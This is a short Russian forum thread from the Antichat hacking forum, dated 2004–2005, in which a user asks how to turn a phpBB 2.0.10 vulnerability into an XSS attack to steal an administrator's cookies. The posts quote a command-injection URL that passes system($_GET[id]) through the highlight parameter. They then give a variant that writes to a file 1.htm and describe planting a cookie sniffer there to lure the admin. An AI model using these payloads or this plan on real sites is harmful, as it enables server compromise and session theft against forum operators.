Форум АНТИЧАТ - Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки? (https://forum.antichat.xyz/showthread.php?t=4627)

virgoz

31.12.2004 17:58

Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки?

Можно ли как-нить с помошью последней уязвимости в phpBB(2.0.10) использовать xss и получить админские куки?
Я пробовал так:

Цитата:

viewtopic.php?t=6&highlight=%2527.system($_GET[id]).%2527&id=echo test!!! и

с обычным текстом все получалось, а вот если вставить например <img src="">, то уже ниче не пишется :(

illusion

02.01.2005 19:30

Ну и увидишь это только ты! Смысл то какой?! Echo ничего не даст!

virgoz

02.01.2005 22:08

Цитата:

Ну и увидишь это только ты! Смысл то какой?! Echo ничего не даст!

:) Я немного не так написал:

Цитата:

viewtopic.php?t=6&highlight=%2527.system($_GET[id]).%2527&id=echo 'test!!!' >> 1.htm

Так я думаю моя идея понятна: Записываем снифер в файл 1.htm, а потом травим адина на эту "Новогоднюю Страничку" :)
Вопрос в том, почему не пропускаются символы <>.

Время: 20:10